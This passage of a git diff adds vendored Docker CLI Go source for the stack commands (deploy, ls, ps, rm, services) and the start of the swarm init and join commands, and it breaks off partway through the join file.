+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli/compose/convert"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/opts"
+)
+
+func getStackFilter(namespace string) filters.Args {
+	filter := filters.NewArgs()
+	filter.Add("label", convert.LabelNamespace+"="+namespace)
+	return filter
+}
+
+func getStackFilterFromOpt(namespace string, opt opts.FilterOpt) filters.Args {
+	filter := opt.Value()
+	filter.Add("label", convert.LabelNamespace+"="+namespace)
+	return filter
+}
+
+func getAllStacksFilter() filters.Args {
+	filter := filters.NewArgs()
+	filter.Add("label", convert.LabelNamespace)
+	return filter
+}
+
+func getServices(
+	ctx context.Context,
+	apiclient client.APIClient,
+	namespace string,
+) ([]swarm.Service, error) {
+	return apiclient.ServiceList(
+		ctx,
+		types.ServiceListOptions{Filters: getStackFilter(namespace)})
+}
+
+func getStackNetworks(
+	ctx context.Context,
+	apiclient client.APIClient,
+	namespace string,
+) ([]types.NetworkResource, error) {
+	return apiclient.NetworkList(
+		ctx,
+		types.NetworkListOptions{Filters: getStackFilter(namespace)})
+}
+
+func getStackSecrets(
+	ctx context.Context,
+	apiclient client.APIClient,
+	namespace string,
+) ([]swarm.Secret, error) {
+	return apiclient.SecretList(
+		ctx,
+		types.SecretListOptions{Filters: getStackFilter(namespace)})
+}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/deploy.go b/vendor/github.com/docker/docker/cli/command/stack/deploy.go
new file mode 100644
index 0000000000..980876a6a1
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/stack/deploy.go
@@ -0,0 +1,357 @@
+package stack
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"sort"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	secretcli "github.com/docker/docker/cli/command/secret"
+	"github.com/docker/docker/cli/compose/convert"
+	"github.com/docker/docker/cli/compose/loader"
+	composetypes "github.com/docker/docker/cli/compose/types"
+	dockerclient "github.com/docker/docker/client"
+	"github.com/pkg/errors"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+const (
+	defaultNetworkDriver = "overlay"
+)
+
+type deployOptions struct {
+	bundlefile       string
+	composefile      string
+	namespace        string
+	sendRegistryAuth bool
+}
+
+func newDeployCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts deployOptions
+
+	cmd := &cobra.Command{
+		Use:     "deploy [OPTIONS] STACK",
+		Aliases: []string{"up"},
+		Short:   "Deploy a new stack or update an existing stack",
+		Args:    cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.namespace = args[0]
+			return runDeploy(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	addBundlefileFlag(&opts.bundlefile, flags)
+	addComposefileFlag(&opts.composefile, flags)
+	addRegistryAuthFlag(&opts.sendRegistryAuth, flags)
+	return cmd
+}
+
+func runDeploy(dockerCli *command.DockerCli, opts deployOptions) error {
+	ctx := context.Background()
+
+	switch {
+	case opts.bundlefile == "" && opts.composefile == "":
+		return fmt.Errorf("Please specify either a bundle file (with --bundle-file) or a Compose file (with --compose-file).")
+	case opts.bundlefile != "" && opts.composefile != "":
+		return fmt.Errorf("You cannot specify both a bundle file and a Compose file.")
+	case opts.bundlefile != "":
+		return deployBundle(ctx, dockerCli, opts)
+	default:
+		return deployCompose(ctx, dockerCli, opts)
+	}
+}
+
+// checkDaemonIsSwarmManager does an Info API call to verify that the daemon is
+// a swarm manager. This is necessary because we must create networks before we
+// create services, but the API call for creating a network does not return a
+// proper status code when it can't create a network in the "global" scope.
+func checkDaemonIsSwarmManager(ctx context.Context, dockerCli *command.DockerCli) error {
+	info, err := dockerCli.Client().Info(ctx)
+	if err != nil {
+		return err
+	}
+	if !info.Swarm.ControlAvailable {
+		return errors.New("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.")
+	}
+	return nil
+}
+
+func deployCompose(ctx context.Context, dockerCli *command.DockerCli, opts deployOptions) error {
+	configDetails, err := getConfigDetails(opts)
+	if err != nil {
+		return err
+	}
+
+	config, err := loader.Load(configDetails)
+	if err != nil {
+		if fpe, ok := err.(*loader.ForbiddenPropertiesError); ok {
+			return fmt.Errorf("Compose file contains unsupported options:\n\n%s\n",
+				propertyWarnings(fpe.Properties))
+		}
+
+		return err
+	}
+
+	unsupportedProperties := loader.GetUnsupportedProperties(configDetails)
+	if len(unsupportedProperties) > 0 {
+		fmt.Fprintf(dockerCli.Err(), "Ignoring unsupported options: %s\n\n",
+			strings.Join(unsupportedProperties, ", "))
+	}
+
+	deprecatedProperties := loader.GetDeprecatedProperties(configDetails)
+	if len(deprecatedProperties) > 0 {
+		fmt.Fprintf(dockerCli.Err(), "Ignoring deprecated options:\n\n%s\n\n",
+			propertyWarnings(deprecatedProperties))
+	}
+
+	if err := checkDaemonIsSwarmManager(ctx, dockerCli); err != nil {
+		return err
+	}
+
+	namespace := convert.NewNamespace(opts.namespace)
+
+	serviceNetworks := getServicesDeclaredNetworks(config.Services)
+	networks, externalNetworks := convert.Networks(namespace, config.Networks, serviceNetworks)
+	if err := validateExternalNetworks(ctx, dockerCli, externalNetworks); err != nil {
+		return err
+	}
+	if err := createNetworks(ctx, dockerCli, namespace, networks); err != nil {
+		return err
+	}
+
+	secrets, err := convert.Secrets(namespace, config.Secrets)
+	if err != nil {
+		return err
+	}
+	if err := createSecrets(ctx, dockerCli, namespace, secrets); err != nil {
+		return err
+	}
+
+	services, err := convert.Services(namespace, config, dockerCli.Client())
+	if err != nil {
+		return err
+	}
+	return deployServices(ctx, dockerCli, services, namespace, opts.sendRegistryAuth)
+}
+func getServicesDeclaredNetworks(serviceConfigs []composetypes.ServiceConfig) map[string]struct{} {
+	serviceNetworks := map[string]struct{}{}
+	for _, serviceConfig := range serviceConfigs {
+		if len(serviceConfig.Networks) == 0 {
+			serviceNetworks["default"] = struct{}{}
+			continue
+		}
+		for network := range serviceConfig.Networks {
+			serviceNetworks[network] = struct{}{}
+		}
+	}
+	return serviceNetworks
+}
+
+func propertyWarnings(properties map[string]string) string {
+	var msgs []string
+	for name, description := range properties {
+		msgs = append(msgs, fmt.Sprintf("%s: %s", name, description))
+	}
+	sort.Strings(msgs)
+	return strings.Join(msgs, "\n\n")
+}
+
+func getConfigDetails(opts deployOptions) (composetypes.ConfigDetails, error) {
+	var details composetypes.ConfigDetails
+	var err error
+
+	details.WorkingDir, err = os.Getwd()
+	if err != nil {
+		return details, err
+	}
+
+	configFile, err := getConfigFile(opts.composefile)
+	if err != nil {
+		return details, err
+	}
+	// TODO: support multiple files
+	details.ConfigFiles = []composetypes.ConfigFile{*configFile}
+	return details, nil
+}
+
+func getConfigFile(filename string) (*composetypes.ConfigFile, error) {
+	bytes, err := ioutil.ReadFile(filename)
+	if err != nil {
+		return nil, err
+	}
+	config, err := loader.ParseYAML(bytes)
+	if err != nil {
+		return nil, err
+	}
+	return &composetypes.ConfigFile{
+		Filename: filename,
+		Config:   config,
+	}, nil
+}
+
+func validateExternalNetworks(
+	ctx context.Context,
+	dockerCli *command.DockerCli,
+	externalNetworks []string) error {
+	client := dockerCli.Client()
+
+	for _, networkName := range externalNetworks {
+		network, err := client.NetworkInspect(ctx, networkName)
+		if err != nil {
+			if dockerclient.IsErrNetworkNotFound(err) {
+				return fmt.Errorf("network %q is declared as external, but could not be found. You need to create the network before the stack is deployed (with overlay driver)", networkName)
+			}
+			return err
+		}
+		if network.Scope != "swarm" {
+			return fmt.Errorf("network %q is declared as external, but it is not in the right scope: %q instead of %q", networkName, network.Scope, "swarm")
+		}
+	}
+
+	return nil
+}
+
+func createSecrets(
+	ctx context.Context,
+	dockerCli *command.DockerCli,
+	namespace convert.Namespace,
+	secrets []swarm.SecretSpec,
+) error {
+	client := dockerCli.Client()
+
+	for _, secretSpec := range secrets {
+		// TODO: fix this after https://github.com/docker/docker/pull/29218
+		secrets, err := secretcli.GetSecretsByNameOrIDPrefixes(ctx, client, []string{secretSpec.Name})
+		switch {
+		case err != nil:
+			return err
+		case len(secrets) > 1:
+			return errors.Errorf("ambiguous secret name: %s", secretSpec.Name)
+		case len(secrets) == 0:
+			fmt.Fprintf(dockerCli.Out(), "Creating secret %s\n", secretSpec.Name)
+			_, err = client.SecretCreate(ctx, secretSpec)
+		default:
+			secret := secrets[0]
+			// Update secret to ensure that the local data hasn't changed
+			err = client.SecretUpdate(ctx, secret.ID, secret.Meta.Version, secretSpec)
+		}
+		if err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func createNetworks(
+	ctx context.Context,
+	dockerCli *command.DockerCli,
+	namespace convert.Namespace,
+	networks map[string]types.NetworkCreate,
+) error {
+	client := dockerCli.Client()
+
+	existingNetworks, err := getStackNetworks(ctx, client, namespace.Name())
+	if err != nil {
+		return err
+	}
+
+	existingNetworkMap := make(map[string]types.NetworkResource)
+	for _, network := range existingNetworks {
+		existingNetworkMap[network.Name] = network
+	}
+
+	for internalName, createOpts := range networks {
+		name := namespace.Scope(internalName)
+		if _, exists := existingNetworkMap[name]; exists {
+			continue
+		}
+
+		if createOpts.Driver == "" {
+			createOpts.Driver = defaultNetworkDriver
+		}
+
+		fmt.Fprintf(dockerCli.Out(), "Creating network %s\n", name)
+		if _, err := client.NetworkCreate(ctx, name, createOpts); err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
+
+func deployServices(
+	ctx context.Context,
+	dockerCli *command.DockerCli,
+	services map[string]swarm.ServiceSpec,
+	namespace convert.Namespace,
+	sendAuth bool,
+) error {
+	apiClient := dockerCli.Client()
+	out := dockerCli.Out()
+
+	existingServices, err := getServices(ctx, apiClient, namespace.Name())
+	if err != nil {
+		return err
+	}
+
+	existingServiceMap := make(map[string]swarm.Service)
+	for _, service := range existingServices {
+		existingServiceMap[service.Spec.Name] = service
+	}
+
+	for internalName, serviceSpec := range services {
+		name := namespace.Scope(internalName)
+
+		encodedAuth := ""
+		if sendAuth {
+			// Retrieve encoded auth token from the image reference
+			image := serviceSpec.TaskTemplate.ContainerSpec.Image
+			encodedAuth, err = command.RetrieveAuthTokenFromImage(ctx, dockerCli, image)
+			if err != nil {
+				return err
+			}
+		}
+
+		if service, exists := existingServiceMap[name]; exists {
+			fmt.Fprintf(out, "Updating service %s (id: %s)\n", name, service.ID)
+
+			updateOpts := types.ServiceUpdateOptions{}
+			if sendAuth {
+				updateOpts.EncodedRegistryAuth = encodedAuth
+			}
+			response, err := apiClient.ServiceUpdate(
+				ctx,
+				service.ID,
+				service.Version,
+				serviceSpec,
+				updateOpts,
+			)
+			if err != nil {
+				return err
+			}
+
+			for _, warning := range response.Warnings {
+				fmt.Fprintln(dockerCli.Err(), warning)
+			}
+		} else {
+			fmt.Fprintf(out, "Creating service %s\n", name)
+
+			createOpts := types.ServiceCreateOptions{}
+			if sendAuth {
+				createOpts.EncodedRegistryAuth = encodedAuth
+			}
+			if _, err := apiClient.ServiceCreate(ctx, serviceSpec, createOpts); err != nil {
+				return err
+			}
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go b/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go
new file mode 100644
index 0000000000..5a178c4ab6
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go
@@ -0,0 +1,83 @@
+package stack
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/compose/convert"
+)
+
+func deployBundle(ctx context.Context, dockerCli *command.DockerCli, opts deployOptions) error {
+	bundle, err := loadBundlefile(dockerCli.Err(), opts.namespace, opts.bundlefile)
+	if err != nil {
+		return err
+	}
+
+	if err := checkDaemonIsSwarmManager(ctx, dockerCli); err != nil {
+		return err
+	}
+
+	namespace := convert.NewNamespace(opts.namespace)
+
+	networks := make(map[string]types.NetworkCreate)
+	for _, service := range bundle.Services {
+		for _, networkName := range service.Networks {
+			networks[networkName] = types.NetworkCreate{
+				Labels: convert.AddStackLabel(namespace, nil),
+			}
+		}
+	}
+
+	services := make(map[string]swarm.ServiceSpec)
+	for internalName, service := range bundle.Services {
+		name := namespace.Scope(internalName)
+
+		var ports []swarm.PortConfig
+		for _, portSpec := range service.Ports {
+			ports = append(ports, swarm.PortConfig{
+				Protocol:   swarm.PortConfigProtocol(portSpec.Protocol),
+				TargetPort: portSpec.Port,
+			})
+		}
+
+		nets := []swarm.NetworkAttachmentConfig{}
+		for _, networkName := range service.Networks {
+			nets = append(nets, swarm.NetworkAttachmentConfig{
+				Target:  namespace.Scope(networkName),
+				Aliases: []string{networkName},
+			})
+		}
+
+		serviceSpec := swarm.ServiceSpec{
+			Annotations: swarm.Annotations{
+				Name:   name,
+				Labels: convert.AddStackLabel(namespace, service.Labels),
+			},
+			TaskTemplate: swarm.TaskSpec{
+				ContainerSpec: swarm.ContainerSpec{
+					Image:   service.Image,
+					Command: service.Command,
+					Args:    service.Args,
+					Env:     service.Env,
+					// Service Labels will not be copied to Containers
+					// automatically during the deployment so we apply
+					// it here.
+					Labels: convert.AddStackLabel(namespace, nil),
+				},
+			},
+			EndpointSpec: &swarm.EndpointSpec{
+				Ports: ports,
+			},
+			Networks: nets,
+		}
+
+		services[internalName] = serviceSpec
+	}
+
+	if err := createNetworks(ctx, dockerCli, namespace, networks); err != nil {
+		return err
+	}
+	return deployServices(ctx, dockerCli, services, namespace, opts.sendRegistryAuth)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/list.go b/vendor/github.com/docker/docker/cli/command/stack/list.go
new file mode 100644
index 0000000000..9b6c645e29
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/stack/list.go
@@ -0,0 +1,113 @@
+package stack
+
+import (
+	"fmt"
+	"io"
+	"strconv"
+	"text/tabwriter"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/compose/convert"
+	"github.com/docker/docker/client"
+	"github.com/spf13/cobra"
+)
+
+const (
+	listItemFmt = "%s\t%s\n"
+)
+
+type listOptions struct {
+}
+
+func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := listOptions{}
+
+	cmd := &cobra.Command{
+		Use:     "ls",
+		Aliases: []string{"list"},
+		Short:   "List stacks",
+		Args:    cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runList(dockerCli, opts)
+		},
+	}
+
+	return cmd
+}
+
+func runList(dockerCli *command.DockerCli, opts listOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	stacks, err := getStacks(ctx, client)
+	if err != nil {
+		return err
+	}
+
+	out := dockerCli.Out()
+	printTable(out, stacks)
+	return nil
+}
+
+func printTable(out io.Writer, stacks []*stack) {
+	writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0)
+
+	// Ignore flushing errors
+	defer writer.Flush()
+
+	fmt.Fprintf(writer, listItemFmt, "NAME", "SERVICES")
+	for _, stack := range stacks {
+		fmt.Fprintf(
+			writer,
+			listItemFmt,
+			stack.Name,
+			strconv.Itoa(stack.Services),
+		)
+	}
+}
+
+type stack struct {
+	// Name is the name of the stack
+	Name string
+	// Services is the number of the services
+	Services int
+}
+
+func getStacks(
+	ctx context.Context,
+	apiclient client.APIClient,
+) ([]*stack, error) {
+	services, err := apiclient.ServiceList(
+		ctx,
+		types.ServiceListOptions{Filters: getAllStacksFilter()})
+	if err != nil {
+		return nil, err
+	}
+	m := make(map[string]*stack, 0)
+	for _, service := range services {
+		labels := service.Spec.Labels
+		name, ok := labels[convert.LabelNamespace]
+		if !ok {
+			return nil, fmt.Errorf("cannot get label %s for service %s",
+				convert.LabelNamespace, service.ID)
+		}
+		ztack, ok := m[name]
+		if !ok {
+			m[name] = &stack{
+				Name:     name,
+				Services: 1,
+			}
+		} else {
+			ztack.Services++
+		}
+	}
+	var stacks []*stack
+	for _, stack := range m {
+		stacks = append(stacks, stack)
+	}
+	return stacks, nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/opts.go b/vendor/github.com/docker/docker/cli/command/stack/opts.go
new file mode 100644
index 0000000000..74fe4f5343
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/stack/opts.go
@@ -0,0 +1,49 @@
+package stack
+
+import (
+	"fmt"
+	"io"
+	"os"
+
+	"github.com/docker/docker/cli/command/bundlefile"
+	"github.com/spf13/pflag"
+)
+
+func addComposefileFlag(opt *string, flags *pflag.FlagSet) {
+	flags.StringVarP(opt, "compose-file", "c", "", "Path to a Compose file")
+}
+
+func addBundlefileFlag(opt *string, flags *pflag.FlagSet) {
+	flags.StringVar(opt, "bundle-file", "", "Path to a Distributed Application Bundle file")
+	flags.SetAnnotation("bundle-file", "experimental", nil)
+}
+
+func addRegistryAuthFlag(opt *bool, flags *pflag.FlagSet) {
+	flags.BoolVar(opt, "with-registry-auth", false, "Send registry authentication details to Swarm agents")
+}
+
+func loadBundlefile(stderr io.Writer, namespace string, path string) (*bundlefile.Bundlefile, error) {
+	defaultPath := fmt.Sprintf("%s.dab", namespace)
+
+	if path == "" {
+		path = defaultPath
+	}
+	if _, err := os.Stat(path); err != nil {
+		return nil, fmt.Errorf(
+			"Bundle %s not found. Specify the path with --file",
+			path)
+	}
+
+	fmt.Fprintf(stderr, "Loading bundle from %s\n", path)
+	reader, err := os.Open(path)
+	if err != nil {
+		return nil, err
+	}
+	defer reader.Close()
+
+	bundle, err := bundlefile.LoadFile(reader)
+	if err != nil {
+		return nil, fmt.Errorf("Error reading %s: %v\n", path, err)
+	}
+	return bundle, err
+}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/ps.go b/vendor/github.com/docker/docker/cli/command/stack/ps.go
new file mode 100644
index 0000000000..e4351bfc7c
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/stack/ps.go
@@ -0,0 +1,61 @@
+package stack
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/idresolver"
+	"github.com/docker/docker/cli/command/task"
+	"github.com/docker/docker/opts"
+	"github.com/spf13/cobra"
+)
+
+type psOptions struct {
+	filter    opts.FilterOpt
+	noTrunc   bool
+	namespace string
+	noResolve bool
+}
+
+func newPsCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := psOptions{filter: opts.NewFilterOpt()}
+
+	cmd := &cobra.Command{
+		Use:   "ps [OPTIONS] STACK",
+		Short: "List the tasks in the stack",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.namespace = args[0]
+			return runPS(dockerCli, opts)
+		},
+	}
+	flags := cmd.Flags()
+	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output")
+	flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names")
+	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
+
+	return cmd
+}
+
+func runPS(dockerCli *command.DockerCli, opts psOptions) error {
+	namespace := opts.namespace
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	filter := getStackFilterFromOpt(opts.namespace, opts.filter)
+	tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter})
+	if err != nil {
+		return err
+	}
+
+	if len(tasks) == 0 {
+		fmt.Fprintf(dockerCli.Out(), "Nothing found in stack: %s\n", namespace)
+		return nil
+	}
+
+	return task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/remove.go b/vendor/github.com/docker/docker/cli/command/stack/remove.go
new file mode 100644
index 0000000000..966c1aa6bf
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/stack/remove.go
@@ -0,0 +1,112 @@
+package stack
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+type removeOptions struct {
+	namespace string
+}
+
+func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts removeOptions
+
+	cmd := &cobra.Command{
+		Use:     "rm STACK",
+		Aliases: []string{"remove", "down"},
+		Short:   "Remove the stack",
+		Args:    cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.namespace = args[0]
+			return runRemove(dockerCli, opts)
+		},
+	}
+	return cmd
+}
+
+func runRemove(dockerCli *command.DockerCli, opts removeOptions) error {
+	namespace := opts.namespace
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	services, err := getServices(ctx, client, namespace)
+	if err != nil {
+		return err
+	}
+
+	networks, err := getStackNetworks(ctx, client, namespace)
+	if err != nil {
+		return err
+	}
+
+	secrets, err := getStackSecrets(ctx, client, namespace)
+	if err != nil {
+		return err
+	}
+
+	if len(services)+len(networks)+len(secrets) == 0 {
+		fmt.Fprintf(dockerCli.Out(), "Nothing found in stack: %s\n", namespace)
+		return nil
+	}
+
+	hasError := removeServices(ctx, dockerCli, services)
+	hasError = removeSecrets(ctx, dockerCli, secrets) || hasError
+	hasError = removeNetworks(ctx, dockerCli, networks) || hasError
+
+	if hasError {
+		return fmt.Errorf("Failed to remove some resources")
+	}
+	return nil
+}
+
+func removeServices(
+	ctx context.Context,
+	dockerCli *command.DockerCli,
+	services []swarm.Service,
+) bool {
+	var err error
+	for _, service := range services {
+		fmt.Fprintf(dockerCli.Err(), "Removing service %s\n", service.Spec.Name)
+		if err = dockerCli.Client().ServiceRemove(ctx, service.ID); err != nil {
+			fmt.Fprintf(dockerCli.Err(), "Failed to remove service %s: %s", service.ID, err)
+		}
+	}
+	return err != nil
+}
+
+func removeNetworks(
+	ctx context.Context,
+	dockerCli *command.DockerCli,
+	networks []types.NetworkResource,
+) bool {
+	var err error
+	for _, network := range networks {
+		fmt.Fprintf(dockerCli.Err(), "Removing network %s\n", network.Name)
+		if err = dockerCli.Client().NetworkRemove(ctx, network.ID); err != nil {
+			fmt.Fprintf(dockerCli.Err(), "Failed to remove network %s: %s", network.ID, err)
+		}
+	}
+	return err != nil
+}
+
+func removeSecrets(
+	ctx context.Context,
+	dockerCli *command.DockerCli,
+	secrets []swarm.Secret,
+) bool {
+	var err error
+	for _, secret := range secrets {
+		fmt.Fprintf(dockerCli.Err(), "Removing secret %s\n", secret.Spec.Name)
+		if err = dockerCli.Client().SecretRemove(ctx, secret.ID); err != nil {
+			fmt.Fprintf(dockerCli.Err(), "Failed to remove secret %s: %s", secret.ID, err)
+		}
+	}
+	return err != nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/services.go b/vendor/github.com/docker/docker/cli/command/stack/services.go
new file mode 100644
index 0000000000..a46652df7c
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/stack/services.go
@@ -0,0 +1,79 @@
+package stack
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/service"
+	"github.com/docker/docker/opts"
+	"github.com/spf13/cobra"
+)
+
+type servicesOptions struct {
+	quiet     bool
+	filter    opts.FilterOpt
+	namespace string
+}
+
+func newServicesCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := servicesOptions{filter: opts.NewFilterOpt()}
+
+	cmd := &cobra.Command{
+		Use:   "services [OPTIONS] STACK",
+		Short: "List the services in the stack",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.namespace = args[0]
+			return runServices(dockerCli, opts)
+		},
+	}
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs")
+	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
+
+	return cmd
+}
+
+func runServices(dockerCli *command.DockerCli, opts servicesOptions) error {
+	ctx := context.Background()
+	client := dockerCli.Client()
+
+	filter := getStackFilterFromOpt(opts.namespace, opts.filter)
+	services, err := client.ServiceList(ctx, types.ServiceListOptions{Filters: filter})
+	if err != nil {
+		return err
+	}
+
+	out := dockerCli.Out()
+
+	// if no services in this stack, print message and exit 0
+	if len(services) == 0 {
+		fmt.Fprintf(out, "Nothing found in stack: %s\n", opts.namespace)
+		return nil
+	}
+
+	if opts.quiet {
+		service.PrintQuiet(out, services)
+	} else {
+		taskFilter := filters.NewArgs()
+		for _, service := range services {
+			taskFilter.Add("service", service.ID)
+		}
+
+		tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: taskFilter})
+		if err != nil {
+			return err
+		}
+		nodes, err := client.NodeList(ctx, types.NodeListOptions{})
+		if err != nil {
+			return err
+		}
+		service.PrintNotQuiet(out, services, nodes, tasks)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/cmd.go b/vendor/github.com/docker/docker/cli/command/swarm/cmd.go
new file mode 100644
index 0000000000..632679c4b6
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/swarm/cmd.go
@@ -0,0 +1,28 @@
+package swarm
+
+import (
+	"github.com/spf13/cobra"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+)
+
+// NewSwarmCommand returns a cobra command for `swarm` subcommands
+func NewSwarmCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "swarm",
+		Short: "Manage Swarm",
+		Args:  cli.NoArgs,
+		RunE:  dockerCli.ShowHelp,
+	}
+	cmd.AddCommand(
+		newInitCommand(dockerCli),
+		newJoinCommand(dockerCli),
+		newJoinTokenCommand(dockerCli),
+		newUnlockKeyCommand(dockerCli),
+		newUpdateCommand(dockerCli),
+		newLeaveCommand(dockerCli),
+		newUnlockCommand(dockerCli),
+	)
+	return cmd
+}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/init.go b/vendor/github.com/docker/docker/cli/command/swarm/init.go
new file mode 100644
index 0000000000..2550feeb47
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/swarm/init.go
@@ -0,0 +1,85 @@
+package swarm
+
+import (
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/pkg/errors"
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+)
+
+type initOptions struct {
+	swarmOptions
+	listenAddr NodeAddrOption
+	// Not a NodeAddrOption because it has no default port.
+	advertiseAddr   string
+	forceNewCluster bool
+}
+
+func newInitCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := initOptions{
+		listenAddr: NewListenAddrOption(),
+	}
+
+	cmd := &cobra.Command{
+		Use:   "init [OPTIONS]",
+		Short: "Initialize a swarm",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runInit(dockerCli, cmd.Flags(), opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.Var(&opts.listenAddr, flagListenAddr, "Listen address (format: <ip|interface>[:port])")
+	flags.StringVar(&opts.advertiseAddr, flagAdvertiseAddr, "", "Advertised address (format: <ip|interface>[:port])")
+	flags.BoolVar(&opts.forceNewCluster, "force-new-cluster", false, "Force create a new cluster from current state")
+	flags.BoolVar(&opts.autolock, flagAutolock, false, "Enable manager autolocking (requiring an unlock key to start a stopped manager)")
+	addSwarmFlags(flags, &opts.swarmOptions)
+	return cmd
+}
+
+func runInit(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts initOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	req := swarm.InitRequest{
+		ListenAddr:       opts.listenAddr.String(),
+		AdvertiseAddr:    opts.advertiseAddr,
+		ForceNewCluster:  opts.forceNewCluster,
+		Spec:             opts.swarmOptions.ToSpec(flags),
+		AutoLockManagers: opts.swarmOptions.autolock,
+	}
+
+	nodeID, err := client.SwarmInit(ctx, req)
+	if err != nil {
+		if strings.Contains(err.Error(), "could not choose an IP address to advertise") || strings.Contains(err.Error(), "could not find the system's IP address") {
+			return errors.New(err.Error() + " - specify one with --advertise-addr")
+		}
+		return err
+	}
+
+	fmt.Fprintf(dockerCli.Out(), "Swarm initialized: current node (%s) is now a manager.\n\n", nodeID)
+
+	if err := printJoinCommand(ctx, dockerCli, nodeID, true, false); err != nil {
+		return err
+	}
+
+	fmt.Fprint(dockerCli.Out(), "To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions.\n\n")
+
+	if req.AutoLockManagers {
+		unlockKeyResp, err := client.SwarmGetUnlockKey(ctx)
+		if err != nil {
+			return errors.Wrap(err, "could not fetch unlock key")
+		}
+		printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey)
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/join.go b/vendor/github.com/docker/docker/cli/command/swarm/join.go
new file mode 100644
index 0000000000..004313b4c6
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/swarm/join.go
@@ -0,0 +1,69 @@
+package swarm
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
